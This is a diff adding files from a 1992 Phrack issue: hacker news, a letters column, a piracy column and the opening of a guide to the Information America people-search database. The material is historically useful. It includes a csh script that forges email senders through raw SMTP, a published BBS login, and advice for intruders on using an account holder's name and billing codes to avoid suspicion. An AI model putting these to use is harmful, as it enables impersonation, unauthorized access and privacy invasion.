+1.  Computer bulletin boards aren't just for dweeby cyberpunks anymore -- at
+    least not in San Francisco.  Entrepreneur Wayne Gregori has created SF Net,
+    a decidedly socialble computer network that links up patrons of the city's
+    dangerously hip cafe's.  From the Lower Haight to south of Market Street,
+    high-tech trendies are interfacing over cappuccino.  All you have to do is
+    buy a ticket from the cafe>, enter a number into an on-site computer and
+    begin your techno-chat at $1 per 15 minutes.  The next Gregori test site is
+    Seattle, Washington.  (Newsweek, December 2, 1991)
+_______________________________________________________________________________
+
+2.  The (November 29, 1991 issue of) San Jose Mercury News reported that the
+    San Mateo, California 911 system was brought to it's knees because of a
+    prank <but not by any computer hacker or phone phreak>.
+
+    It seems that a disc jockey at KSOL decided to play a recent MC Hammer
+    record over and over and over... as a prank.  Listeners were concerned that
+    something had happened to the personnel at the station, so they called 911
+    (and the police department business line).  It seems that a few hundred
+    calls in forty five minutes or an hour was enough to jam up the system.
+    There was no report in the newspaper of any deaths or injuries to the
+    overloaded system.
+
+    The DJ didn't want to stop playing the record (claiming First Amendment
+    rights), but did insert an announcement to not call the police.
+_____________________________________________________________________________
+    
+3.  Jean Paul Barrett, a convict serving 33 years for forgery and fraud in the
+    Pima County jail in Tuscon, Arizona, was released on December 13, 1991
+    after receipt of a forged fax ordering his release.  It appears that a copy
+    of a legitimate release order was altered to bear HIS name.  Apparently no
+    one noticed that the faxed document lacked an originating phone number or
+    that there was no "formal" cover sheet.  The "error" was discovered when
+    Barrett failed to show up for a court hearing.
+
+    The jail releases about 60 people each day, and faxes have become standard
+    procedure.  Sheriff's Sergeant Rick Kastigar said "procedures are being
+    changed so the error will not occur again."  (San Francisco Chronicle,
+    December 18, 1991, Page A3)
+_______________________________________________________________________________
+
+4.  AT&T will boosted it's rates on direct-dial, out-of-state calls on January
+    2, 1992.  The increase, to affect weekday and evening calls, would add
+    about 8 cents to the average monthly long-distance bill of $17 and about
+    $60 million to AT&T'd annual revenue. (USA Today, December 23, 1991, Page
+    B1)
+_______________________________________________________________________________
+
+5.  The following was in the AT&T shareholders quarterly, and is submitted not
+    as a commercial solicitation but because somebody might be interested.
+
+    A colorful 22-by-28-inch poster that traces the development of the
+    telephone from Bell's first model to the latest high-technology feature
+    phone can be purchased for $12.  To order, send a check to Poster, AT&T
+    Archives, WV A102, 5 Reinman Road, Warren, NJ 07059-0647.
+    (Telephone 908-756-1590.)" 
+
+    (Special Thanks: The Tone Surfer)
+_______________________________________________________________________________
+
+6.  Word has it that the normal toll-free number blue-box is now DEAD in
+    Norway.  According to some information received by Phrack, the toll-free
+    numbers got switched onto the regular phone network in the United States,
+    which you can't phreak the same way.  (Special Thanks: Nosferatu)
+_______________________________________________________________________________
+
+7.  In case you've been trying to call Blitzkreig BBS and been unable to
+    connect with it,  Predat0r is moving his board into the basement.  He
+    said the board would be back up as of February 1st.  He also said that
+    master copy of TAP #106 is finished, but he is a year behind on updating
+    his mailing list.  Predat0r said that making the copies was no problem but
+    that with the influx of subscribers he was going to have to enlist local
+    help to get the database updated.  He also said that if someone paid for
+    ten issues they will get ten issues.  (Special Thanks: Roy the Tarantula)
+_______________________________________________________________________________
+
+8.  There is a new science fiction book about called "Fallen Angels" by Larry
+    Niven.  The basis for the book is this:  The United States government has
+    been taken over by religious fanatics and militant environmentalists.
+    Soon the United States is an Anti-Technological police state.  Two
+    astronauts are shot down over the United States and are on the run.  They
+    are on the run from various government agencies such as the (Secret
+    Service like) Environmental Protection Agency.  Nivin's wild imagination
+    provides for a great deal of humor as well as some things that are not
+    funny at all, due to the fact that they hit just a little to close to home.
+
+    The story also mentions the Legion of Doom and The Steve Jackson Games
+    raids.  In the "acknowledgments" section at the rear of the book the author
+    has this to say, "As to the society portrayed here, of course much of it is
+    satirical.  Alas, many of the incidents --- such as the Steve Jackson case
+    in which a business was searched by Secret Service Agents displaying an
+    unsigned search warrant --- are quite real.  So are many of the anti-
+    technological arguments given in the book.  There really is an anti-
+    intellectual on-campus movement to denounce 'materialistic science' in
+    favor of something considerably more 'cold and unforgiving.'  So watch it."
+    (Special Thanks: The Mad Alchemist)
+_______________________________________________________________________________
+
+9. Bell Atlantic Shoots Themselves in the Foot (February 5, 1992) -- Newsbytes
+   reports that Bell Atlantic admits having funded an advocacy group "Small
+   Businesses for Advertising Choice" to oppose HR 3515, a bill regulating
+   the RBOCs' entry into info services.  Tennessee Democrat Jim Cooper, the
+   sponsor, called it a "clumsy Astroturf campaign," meaning fake grass roots.
+
+   Republican co-sponsor Dan Schaeffer was a target of a similar campaign by US
+   West, in which telephone company employees were encouraged to call their
+   representatives on company time to oppose the measure.
+
+   The bill is HR 3515.  To get a copy, call the House Documents Room at
+   (202)225 3456 and ask for a copy.  It's free (more accurately, you have
+   already paid for it).
+_______________________________________________________________________________
+
+10. Computer Hackers Get Into Private Credit Records (Columbus Dispatch,
+    February 24, 1992) -- DAYTON - Computer hackers obtained confidential
+    credit reports of Midwest consumers from a credit reporting firm in
+    Atlanta.  Atlanta-based Equifax said a ring of 30 hackers in Dayton [Ohio]
+    stole credit card numbers and bill-paying histories of the consumers by
+    using an Equifax customer's password.
+
+    Ronald J. Horst, security consultant for the company said the break-in
+    apparently began in January.  Police don't know if the password was stolen
+    or if an employee of the client company cooperated with the hackers.  Horst
+    said the hackers were apparently doing it just for fun.  No charges have
+    been filed.  Equifax will notify customers whose credit reports were taken.
+_______________________________________________________________________________
+
+11. Fingerprints And Connected Databases (Summary of an article by Stephen
+    Schwartz, San Francisco Chronicle, February 22, 1992, Page A16) -- A
+    fingerprint found in an unsolved 1984 murder of an 84-year-old woman was
+    kept in the San Francisco police database all these years.  Recently the
+    San Francisco fingerprint database was linked with the Alameda County
+    fingerprint database.  The old print matched a new one taken in connection
+    with a petty theft case, and so eight years later the police were able to
+    solve the old case (burglary, arson, homicide).  The two girls implicated
+    were 12 and 15 at the time.  (Special Thanks: Peter G. Neumann of RISKS)
diff --git a/phrack37/2.txt b/phrack37/2.txt
new file mode 100644
index 0000000..e6ffa3f
--- /dev/null
+++ b/phrack37/2.txt
@@ -0,0 +1,352 @@
+                          [-=:< Phrack Loopback >:=-]
+
+                                By Phrack Staff
+
+     Phrack Loopback is a forum for you, the reader, to ask questions, air
+problems, and talk about what ever topic you would like to discuss.  This is
+also the place Phrack Staff will make suggestions to you by reviewing various
+items of note; magazines, software, catalogs, hardware, etc.
+______________________________________________________________________________
+
+ Review of 2600 Magazine Autumn 1991
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ PO Box 752                                     Individual Subscription Rates:
+ Middle Island, NY 11953                        US : 4 issues (1 year) $21.00
+ InterNet: 2600@well.sf.ca.us                   OS : 4 issues (1 year) $30.00
+ Phone: 516-751-2600                            Corporate / Business Rates:
+ Fax: 516-751-2608                                 : 4 issues (1 year) $50.00
+
+ By Dispater
+
+     2600 Magazine has been published since 1984 by Emmanuel Goldstein.  "The
+Hacker Quarterly" runs just shy of 50 pages and is printed with nice glossy
+covers to make a 5.5"x8.25" magazine.  In 2600 you will find the usual articles
+about hacking and phreaking, as well as a few surprises.  2600 often covers
+topics that do not necessarily pertain to hacking or phreaking, but are quite
+useful.  There is also a "letters to the editor" section and even a place for
+people to buy/sell goodies.
+
+     This particular issue contains an article on Simplex locks and how easy it
+is to open them.  Included are pictures of opened Federal Express mail boxes
+that use Simplex locks.  The next most interesting thing I found was an
+article on those strange little lines on business letters.  "Postal Hacking"
+will not necessarily tell you how to mail letters for free, but will tell you
+how you can speed up the process of delivery for free.  Then there was the the
+"Protecting Your Social Security Number" article that was recently printed in
+Phrack Inc Issue 35.
+
+     There was also an article about the video tape of the Dutch hackers
+breaking into the military systems.  2600 even offers to sell the videotape
+that was partially played on the evil Geraldo Show [dick].  There was also a
+good article written about psychology in the hacker world.  The somewhat
+Freudian analysis of the female security agent fearing "mounting" (of her hard
+drive), "penetration" (of her system), "infection" (from viri), and "has a
+headache" (due to hackers) was insiteful as well as very funny.  Moving on to
+the other parts of 2600, you can find scattered tidbits of misc information
+(ie: lists of COCOTs, NUAs, ANIs, small useful programs, and interesting
+business/government forms they get from readers, etc)
+
+     Finally, this is the part that everyone complains about, the price.  But,
+2600 has a great deal for those poor college hacker out there.  If you submit
+something to 2600 Magazine that is printed, you get a free subscription.  That
+sounds fair to me!  Maybe we should try the same thing with Phrack?
+
+     All in all 2600 Magazine is a GREAT publication and is highly recommended.
+_______________________________________________________________________________
+
+ What's On Your Mind?
+ ~~~~~~~~~~~~~~~~~~~~
+
+:: Some People Never Get The Hint ::
+
+     Recently Phrack Inc. received a subscription request from an individual
+who played a key role in Operation Sun-Devil.  You may know him from bulletin
+boards where he often used names like "The Dictator" or "Blind Faith."  We know
+him as Dale Drew.  Who would imagine that he would dare to ask us for a
+subscription?  I personally couldn't believe it.
+
+     Just in case you forgot or have been living in a hole for the past two
+years, Dale Drew was a paid United States Service informant who secretly
+enabled government agents to videotape SummerCon '88 in St. Louis, Missouri.
+
+     The following is an example of a Dale Drew/The Dictator/Blind Faith
+posting on a bulletin board.  He claims to be a cosysop on Lutzifer as well as
+some other nonsense.
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+ZDDDDD Packet Switching Networks/PSNs DDDD September 27, 1991 at 8:52 pm DDDDD?
+3 Left by  Blind Faith (Level 40)Title: Telenet (No Replies)3
+3 > <-702-> CoSys on Lutz (Tymnet) <To: Anyone3
+@DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDY
+
+Couple of Things:
+
+Anyone, besides myself, have any experience with Tymnets and/or Telenet
+debuggers? (Xray, TDT2, Isis, etc)...  TDT2 on Telenet is great, cus on the
+private nets they've got a hard-coded password...always gets you in.  They used
+to have it on the public net too, but about two years ago they fixed it.
+(maybe nbot all of it, but I cant find any that still do)
+
+sprint is a tymnet nui that goes to telenet
+
+telenet is changing there host format.  they are adding an extra digit (too
+many hosts, i guess).  so be on the look out for that.  Im not sure when, but
+the customer service rep, was VERY helpful..
+
+--BF
+"What, me worry?"
+[Message menu] Command (?/Help):
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+     Dale Drew is currently working for Tymnet security.  For more information
+about the activities of Dale Drew, it is highly recommended that you read
+Computer Underground Digest (CUD) Issue 3.02.
+
+     Since I knew that Knight Lightning would enjoy (smirk) hearing from his
+old pal, I forwarded the mail appropriately to Knight Lightning's email
+address.
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+From: ddrew@btnagns.Tymnet.COM (Dale Drew)
+To: phrack@stormking.com
+
+I would like to have my name added to the Phrack Mailing List.  In the past, I
+have been getting the Phracks from the University of Chicago, but it would be
+more convenient to have the Phracks mailed to me.
+
+Also, I was terribly disappointed to see that Phrack had decided to lower its
+standards of information by releasing the contents of Phrack issue #36.
+
+Dale Drew
+Sr. Information Security Specialist
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+From: Knight Lightning
+To: Dale Drew
+
+Dale (DicKtator/Blind Faith) -- I have to admit that you have balls to send a
+letter to my friends at Phrack and requesting a subscription.
+
+You are a paid informant for the Secret Service.  You set people up to get
+busted.  You take people's trust and turn on them.  You are a liar and a fraud.
+You know, Dale, I never imagined such things until a couple of weeks before I
+went to trial and I had the opportunity to watch those video tapes of
+SummerCon '88.  You and your fascist Secret Service law enforcement friends
+definitely put one over on us (even if there isn't anything illegal taking
+place on those tapes... Great way to spend the taxpayers' money).
+
+So when you wrote to Phrack the other day, did you really think they would not
+know who you were?  Did you expect a warm welcome?
+
+During the time that I was editor of Phrack, I had a policy of inviting law
+enforcement and security people on to the Phrack mailing list.  I don't run
+Phrack anymore, but my recommendation to the current editors is very simple.
+They should not send Phrack to you... not because you are with law
+enforcement... because you are the LOWEST FORM OF LIFE and deserve nothing
+except our strong dislike.
+
+In short -- I speak on behalf of the modem community in general,
+"FUCK OFF GEEK!"  Crawl back under the rock from whence you came and go
+straight to hell!
+
+Knight Lightning
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+From: Dale Drew
+To: Knight Lightning
+
+Craig,
+
+Apparently you are not as mature as I was led to believe.  Not being on the
+Phrack mailing list is not a concern to me, it was merely a convenience.
+Phrack, as I am sure you are aware of, is available all over the net and I will
+just continue to receive my copies from there.
+
+I had no idea that you and the newly founded editors of Phrack have decided to
+become so childish.  But I suppose things will never change, and that I am sad
+to see.
+
+--Dale
+_______________________________________________________________________________
+
+:: Best Evidence ::
+
+From: John Higdon
+To: Dispater
+
+> Dispater writes:
+>
+> I think the joke issue of Phrack (36) will contain a top 10 list of stupid
+> things the SS likes to take.
+
+I am consulting with the defense for an up coming trial and had the opportunity
+to examine the "evidence" seized in the defendant's home.  Notable items: model
+rocket launcher, local area street maps, about a dozen 2500-style telephones, a
+typewriter, pre-recorded audio cassettes.  An interesting item was left behind:
+a TSPS console.
+
+One wonders what (if anything) goes through the minds of the officers executing
+the warrant.
+
+John
+_______________________________________________________________________________
+
+:: Fed Proof Your BBS, NOT! ::
+
+     I'm sure many of you have seen text files on making your BBS more secure.
+One such file floating around is by Babbs Boy of Midnight Society.  One of the
+members of our Phrack Staff showed this document to EFF's Mike Godwin, who is
+an attorney.  He had the following comments:
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+From: Mike Godwin
+To: Phrack Inc.
+
+(In regards to some of the files about how to "fed-proof" your bbs:)
+
+>  Let's start with the log on screen:  If FEDZ want anything from your board,
+>  they are required to provide 100% accurate information.
+
+This is false.  Ask the legislators who've been convicted in "sting"
+operations.  In fact, so far as I can tell in a brief run-through of this
+document, absolute no part of the so-called "legal" advice is true.
+
+Law enforcement agents who misrepresent their identities (e.g., "undercover
+agents") produce admissible evidence all the time.
+
+--Mike
+_______________________________________________________________________________
+
+:: Diet Phrack is Good For You ::
+
+From: Gordon Meyer
+To: Dispater
+Subject: Phrack #36
+
+Thanks for sending over Diet Phrack!  It looks like some of the old energy has
+finally been renewed.  I especially liked the introduction, there is intensity,
+pride, and humor sprinkled thru out.  Reminds me a lot of some of the "old"
+PHRACK issues.  Neat!
+
+Later,
+Gordon R. Meyer
+_______________________________________________________________________________
+
+:: Anonymous Mail ::
+
+ From: Creeping Death
+
+>         Hi guys.  I was wondering if you could tell me how to send anonymous
+> mail.  I heard that you could but no one here at my university seems to have
+> a clue.  Please help me out
+>
+
+     There are many ways to do this.  One way is to use the method described
+below.  However, keep in mind there are other ways of doing this.
+
+Dispater
+
+-  -  -  -  -  -  -  -  -  -  -  -  -  -  -  -  -  -  -  -  -  -  -  -  -  -  -
+
+ Anonymous Mail via SMTP Using A Simple Shell Script
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ From: The Artful Dodger
+
+     This file is for those people who like/want to send anonymous mail via the
+net but don't like the hassle of raw SMTP commands.  So, I wrote a simple shell
+script to take care of this.  This program is quite simple but I will give a
+brief explanation anyway.
+
+     There are two ways to run this program.  Just type the name you save it as
+or the name you save it as plus the person you want to mail.  Either way you
+will eventually get to the From: prompt.  If you just hit return at this prompt
+it will assign your userid@your hostname.  Otherwise you can type whatever you
+feel like.
+
+     Next you will get the prompt asking you which host you wish to use for
+SMTP.  If you are using the host you are on, just hit return as this is the
+default.  Otherwise enter any host that allows telnet to port 25.  Then you get
+to pick which editor you wish to use for mailing.  It defaults to vi but you
+can use whatever you like.  Basically, that is all there is interactively.
+After you enter this information, the program creates a file called tmpamail1.
+To this file it appends four lines of data.  The first line is 'helo amail' as
+some host's SMTP port will not accept commands until one introduces themself to
+the host.  The next line is 'mail from: ' and who the mail is from or who it is
+supposedly from.  The third line contains 'rcpt to: ' and who the mail is going
+to.  And the last line is simply the word 'data'.
+
+     Now, these commands could all be entered manually but why bother when you
+have a program to do it for you.  Ok, now the program invokes your editor and
+creates a file called tmpamail2.  After you are done making the message and you
+exit the editor, it asks you if you want to send this message.  I believe that
+is pretty much self explanatory.  Then the program appends a '.' and a 'quit'
+to tmpamail2.  Then it appends tmpamail2 to tmpamail1 so you have one file
+containing all the necessary header info to send a message via SMTP and quit
+>from SMTP.  Then the program sends all this to port 25 of the host that was
+specified.  And if all goes well, the person should have some mail waiting for
+them.  And one last thing.  The program deletes both tmpamail files after it is
+finished.  Well, I hope you all enjoy this little script as it makes sending
+anonymous mail a little easier.
+
+The Artful Dodger
+
+===============================================================================
+
+#! /bin/csh -fB
+### This is a simple shell script for easy use of anonymous mail.  To run the
+### program just save it and delete everything up until the #! /bin/csh -fB
+### line.  Then just type the name you save it as or the name and whoever
+### you will be mailing.  e.g.  amail bill@some.university.edu or just amail.
+###
+###   The Artful Dodger
+
+if ($1 != "") then
+   set mto=$1
+else
+   echo 'To: '
+   set mto=$<
+endif
+
+echo -n 'From: '
+set mfrom=$<
+
+echo -n 'Use which host for smtp (return for '`hostname`') ? '
+set usehost=$<
+
+echo -n 'Use which editor (return for vi)? '
+set editor=$<
+if($editor =="") then
+   set editor=vi
+endif
+
+if ($mfrom == "") then
+   set mfrom=`whoami`'@'`hostname`
+endif
+
+echo 'helo amail' >> tmpamail1
+echo 'mail from: '$mfrom >> tmpamail1
+echo 'rcpt to: '$mto >> tmpamail1
+echo 'data' >> tmpamail1
+
+$editor tmpamail2
+
+clear
+echo -n 'Are you sure you want to send this? '
+set yorn=$<
+if($yorn == 'y') then
+   echo . >> tmpamail2
+   echo quit >> tmpamail2
+   cat tmpamail2 >> tmpamail1
+   telnet $usehost  25 < tmpamail1 > /dev/null
+   echo 'Mail has been sent to: '$mto
+   echo '                 From: '$mfrom
+endif
+rm tmpamail1 tmpamail2
+
+
diff --git a/phrack37/3.txt b/phrack37/3.txt
new file mode 100644
index 0000000..e95d055
--- /dev/null
+++ b/phrack37/3.txt
@@ -0,0 +1,140 @@
+                                 Pirates' Cove
+                                   Issue One
+
+               A New Regular Column Appearing In Phrack Magazine
+                                   By Rambone
+
+
+1) Introduction
+
+     Well first off, I'd like to introduce myself.  I go by the handle Rambone,
+and I run a board in the Midwest area.  I'm sure a column like this is a shock
+to a lot of reader's, but after talking to Dispater, many readers, and people
+in the hacking and pirate world, we came to this conclusion: Piracy and *Warez
+Dudez* have come a long way in the last five years, and are a definite part of
+the underground.  Whether you read the magazine for information about hacking,
+phreaking, or even those great PWN stories, I think this column will be a
+welcome part of Phrack Magazine.
+
+
+2) Virii
+
+     Some poor unsuspecting fool downloads a program, unzips it, and instead of
+checking it for a virus, starts the program up.  After deciding it's a lame
+game, he deletes it and turns off his computer, going to sleep without a worry
+in the world.  The next day he wakes up and tries to turn on his computer, but
+it tells him, "Bad or missing COMMAND.COM" or something of that nature.
+
+     This is just an example of what's happened to countless people in the
+pirate world, not expecting what is soon to be hours of frustrating
+reconstruction of his hard drive.  Even though virii have been a common problem
+for many years, it hasn't been until recently that they have made an impact in
+the Pirate world.
+
+     Whether it's bickering between groups, or even a lonely individual who has
+absolutely nothing better to do than beat his meat and put out a trainer with a
+fucking virus in it, it is wrong.  The people responsible for it that play a
+roll in the distribution of the software are, in my opinion, the biggest
+culprits; they know what they are about to do, and have no conscience in
+sending it out.  Just the mere fact that the only way they think they can get
+back at another group is by distributing a program with a virus or a Trojan is
+moronic.
+
+     I'm not preaching the fact that groups should or should not bicker.  That
+is always going to happen.  What I an saying is that there is a responsibility
+by the groups to be cool and stop the distribution of programs with virii or
+Trojan's.  On the flip side of the coin, most sysops do not intentionally send
+out these infected programs.  They are sent up to the BBS, and by the time they
+are caught, it's too late, and they are already all over the country.
+
+     My main concern is for the user.  If all one group was doing was giving
+another group problems, then there wouldn't be one.  But to irresponsibly
+release a program containing a virus has to be one of the lowest retaliatory
+responses that can be done in the pirate world, and needs to be stopped to
+bring piracy back to a higher level it once had before the rash of bombs began.
+
+*Note to user*
+
+     Most virii are in the form of trainers and cracks, so be wary of every one
+you have or get.  The best way to check is with PKUNZIP -T and McAffee's Virus
+Scanner; I've found it to be the most reliable.  If anyone is having trouble
+with being able to temporarily open a .ZIP, .ARJ, etc., I have a sharp .BAT
+file to do this and will type it up in a future issue.  DO NOT use a program
+without at least scanning the directory you unzipped it to, even though
+scanning the zip is much safer.
+
+
+3) Nets
+
+     Some issues here will be the discussion of up and coming nets, as well as
+established ones.  Let me first explain what a net is:  a net is a group of
+messages sent out over the networks via modem.  They are then received by a BBS
+and sent to the appropriate message subs for the sysop and users to read.  One
+up and coming net in particular that would be appealing to a wide variety of
+sysops is called "CyberCrime."  This net is looking for boards that are Fido
+compatible, i.e.:  LSD, Telegard, WildCat, Tag, Remote Access, Omega, QBBS,
+Paragon, Infinity, Revelation, Cypher, etc.  This net is heavy into P/H/C/A as
+well as pirate discussions.  They are also hooked into TSAN general discussions
+and are working on sysop's connections with other nets.  If you are interested
+in joining this net, apply at Infinite DarkNess, (305)LOOK4-IT, log on as
+Cybercrime and password=Death, and follow the instructions.  Fill out the
+CyberCrime node application.  MidNight Sorrow will call your BBS (must be a
+full-time system), login, and upload CYBER.ARJ, the CyberCrime official
+start-up kit.  After that, you're in.
+
+
+4) BBSes
+
+     Because of NSHB/USA/TGR busts, I have decided to hold off on any reviews
+of BBS's.  Hopefully the paranoia over these busts will subside, and we can
+pick this area back up.
+
+
+5) News Update
+
+     Well, as we all know by now, The NotSoHumble Babe and The Grim Reaper,
+sysop of The Void, got busted for carding.  This has been written up and talked
+about in every magazine out, so all I'm going to say is that it's brought a lot
+of paranoia to the pirate community, and some good boards have gone down as a
+result.  Since I have not spoken to Amy or Mike about this I will not go into
+specifics.  Amy (NSHB) was a member of USA (United Software Association) and
+Mike (TGR) ran a BBS called The Void, and was an INC Distro Site.  But until I
+hear back from a certain person at USA, I'm not going to talk about some 3rd
+party gossip, so this will be continued in the next issue.
+
+6) New Warez
+
+     Game of the Month:
+
+                          Star Trek:  25th Anniversary
+
+
+     Graphics     [CGA/EGA/VGA]
+     Sound        [ADL/SNB/PCSPK]
+     Controls     [Mouse/JS/KYB]
+     Cracked by   [EMC/USA/Razor?]
+     Supplied by  [?]
+     Cracked by   [Separate Crack]
+     Protection   [Dox Check]
+
+     Three cracking groups claimed to put this out first.  Since I saw it
+released by EMC first for a few hours, this is who I'll go with.  This is one
+of those games that, whether you are a Trekkie fan or not, you'll love.  The
+opening screen depicts the Enterprise screaming across your screen, and the
+music from the original soundtrack blares through your speakers (if you use a
+soundcard).  You then are thrust into a mock battle with another ship, and your
+adventure begins.  You are then directed by Star Fleet to go on your first
+mission, where you will try and save a planet.  The graphics are excellent, and
+remind me a lot of the new Sierra-type games, with the backgrounds painted in.
+This game has an adventure theme as well as several space combat scenarios, and
+a mouse is recommended to be able to get around as quickly as you can in combat
+scenes.  The puzzles involved are very hard, and there is both a walk-through
+and cheat out on your local BBSes.  So if you cannot get through some of the
+puzzles, there is help out there; you just have to find it.
+
+*Note*
+
+     Well that's it for now.  I had to take out 60% of this article because
+many people are laying low for a couple of months, so look for more in-depth
+coverage in the future including interviews, BBS reviews, profiles, and
+cracking tips.
diff --git a/phrack37/4.txt b/phrack37/4.txt
new file mode 100644
index 0000000..5291ae4
--- /dev/null
+++ b/phrack37/4.txt
@@ -0,0 +1,1080 @@
+:===:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:===:
+:==                                                                         ==:
+:==                      Exploring Information-America                      ==:
+:==                     :=============================:                     ==:
+:==                                   by                                    ==:
+:==               The Omega                           White Knight          ==:
+:==  Restricted Data Transmissions (RDT)      Cult of the Dead Cow (-cDc-)  ==:
+:==                                                                         ==:
+:==                                                                         ==:
+:==                  "Truth Is Cheap, But Information Costs!"               ==:
+:==                                                                         ==:
+:==                          ------------------------                       ==:
+:==                                                                         ==:
+:==        "Textfiles:  We're in it for the girlies and the money."         ==:
+:==                                                                         ==:
+:==  Monkey-Boyz!                                                  1/24/92  ==:
+:===:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:===:
+
+
+ Introduction
+ ~~~~~~~~~~~~
+     The Information Era has only recently come of age; powerful database
+technology has become more affordable to implement (witness MCI's ability to
+maintain a database of the people you most frequently call for participation in
+its Friends & Family program), and parallel to it, information gathering has
+become more extensive and more scrutinizing.  After weapons manufacturing, and
+drug running, "information gathering" is probably one of the most profitable
+enterprises in America.
+
+     Over the past two decades, credit bureaus, telephone companies and direct
+marketers have collectively amassed complete consumer profiles on over 150
+million Americans.  But for the most part, this information has been used only
+to predict consumers' future buying habits, or worse:  to influence them.  For
+billing and marketing purposes, up-to-date address and telephone information,
+as well as information about your household has been incidentally maintained.
+
+     But, until recently, none of this information was COMMERCIALLY available
+IN A SINGLE DATABASE, specifically with law enforcement, private-investigators,
+bounty-hunters and lawyers in mind.  To our knowledge, Information America is
+the first accessible service to make use of previously collected data for the
+expressed purpose of providing the up-to-date whereabouts, personal profiles
+and information regarding legal entanglements (i.e., bankruptcy filings,
+lawsuits, etc.) of as many Americans as possible.
+
+
+ Information America
+ ~~~~~~~~~~~ ~~~~~~~
+     "Whether you are conducting a background check, looking for a witness,
+     skip tracing, or gathering information for court, [Info America] gives
+     you a quick, easy method for gathering information on individuals across
+     the country... at the touch of a key."
+
+     Information America (IA) provides a single service whose databases cross-
+index the Postal Service's National Change of Address file (NCOA), major
+publisher and direct marketing companies' client information, birth records,
+driver's license records, phone books, voter registrations, various
+governmental records, and more.  IA boasts that over 111 million names, 80
+million households and 61 million telephone numbers are maintained (as
+reasonably up-to-date as possible) on-line.
+
+     Together with IA's access to additional databases, such as Dun &
+Bradstreet, Secretary of State records and records from up to 49 government
+agencies, you can:
+
+     * Locate a missing defendant or witness and obtain a neighbor listing for
+       further investigation.
+
+     * Locate corporate officers, share-holders, or missing heirs.
+
+     * Locate individuals for collection purposes.
+
+     * Locate a fugitive parent who's kidnapped his child from the other parent
+       during a custody battle.
+
+     * Identify the corporate affiliations of an individual.
+
+     * Examine bankruptcy, lawsuit, liens and judgement records on individuals
+       and businesses.
+
+     * Examine Securities and Exchange Commission filings and business news
+       compiled from major newswires.
+
+     * Gather information about a company's officers, ownership, financial
+       status and parent/subsidiary relationships.
+
+     * Determine if a foreign corporation has a resident agent for local
+       service of process (i.e., for serving a lawsuit).
+
+
+ Logging onto IA
+ ~~~~~~~ ~~~~ ~~
+     Access to Information America is provided through your local Tymnet dialup
+(7-E-1); use a terminal identifier of 'a', and type "infoam" at the "please log
+in:" prompt.  IA will prompt you with the familiar VAX 'USERNAME' and
+'PASSWORD' prompts.  Usernames of the form "BIDAxxxx" (where x is a digit) are
+recognizable to the VAX as IA accounts and cause it to execute the script that
+provides the interactive database environment once the correct password is
+supplied.  Accounts which bypass the interactive environment and provide you
+with the normal VAX shell-access must exist, but neither White Knight nor I
+have explored that avenue.
+
+     In any event, once you log on, you are greeted with something similar to:
+
+   ----------------------------[ Title Screen ]----------------------------
+
+        Welcome to VAX/VMS version V5.4-2 on node ALAMO
+    Last interactive login on Thursday, 17-SEP-1991 12:47
+
+
+                   COMPUTER EQUIPMENT SELECTION MENU
+
+
+  What type of computer equipment or software are you using?
+
+
+       1.  PERSONAL COMPUTER (or 100% IBM compatible)
+       2.  PERSONAL COMPUTER with WESTMATE SOFTWARE
+       3.  WESTLAW TERMINAL
+       4.  OTHER EQUIPMENT
+       5.  NETWORK SYSTEM (TTY)
+
+      99.  EXIT OFF SYSTEM
+
+
+  Please call Information America's Client Support at 1-(800) 235-4008
+  if you would like assistance.
+
+
+Please specify number: 1
+
+   * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
+   *                                                                   *
+   *                 W E L C O M E    T O   T H E                      *
+   *                                                                   *
+   *      I N F O R M A T I O N   A M E R I C A   N E T W O R K        *
+   *                                                                   *
+   * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
+
+        For details select menu option 75 on the beginning IA Menu
+
+  * Information America Expands California Lawsuits!
+
+  * Global Real Property Asset Locator Now Online!
+
+  * Cover All the Bases...Using the NEW, IMPROVED CORPORATE GLOBAL Service!
+
+
+Enter your name (last name first): public, john
+
+   ----------------------------[ Title Screen ]----------------------------
+
+     In most cases, IA's clients use IBMs or compatibles to connect.  However,
+option 1 (PERSONAL COMPUTER (or 100% IBM compatible)) works well enough for
+anyone who can emulate VT-100.
+
+     The "Enter your name (last name first)" prompt is purely for your own
+internal billing purposes so that you, as a legitimate account holder, can
+track account use by separate members of your corporation.  Hypothetically
+speaking, if someone were interested in accessing the system without a valid
+account of their own, the most likely way to alleviate suspicion would be to
+use the name of someone who actually works at the account holder's organization
+-- the account holder himself, for instance.
+
+     At some point, IA will prompt you to enter a Client Billing Code.  Again,
+this information is purely for the account holder's own internal billing
+purposes.  IA is an expensive service; on top of the $95 per month fee, there
+are hourly connect charges, per-item charges and several hidden costs.  If only
+for that reason alone, IA's clients tend to be very anal about cross-checking
+their itemized bills.  If possible, provide a Client Billing Code which is
+consistent with the account holder's organization's billing code scheme.
+
+
+ Information America: Main Menu
+ ~~~~~~~~~~~ ~~~~~~~  ~~~~ ~~~~
+     There are 19 main search-options available through IA, which fall into
+three categories:
+
+     - Corporate, UCC, & Related Records
+     - Nationwide Services
+     - County & Court Records
+
+   ------------------------------[ Main Menu ]-----------------------------
+
+INFORMATION AMERICA NETWORK                                1
+
+      I N F O R M A T I O N   A M E R I C A   B E G I N N I N G   M E N U
+                  (Copyright 1991, Information America, Inc.)
+
+                  CORPORATE, UCC, & RELATED RECORDS
+                   1. Corporate Global (CGL)
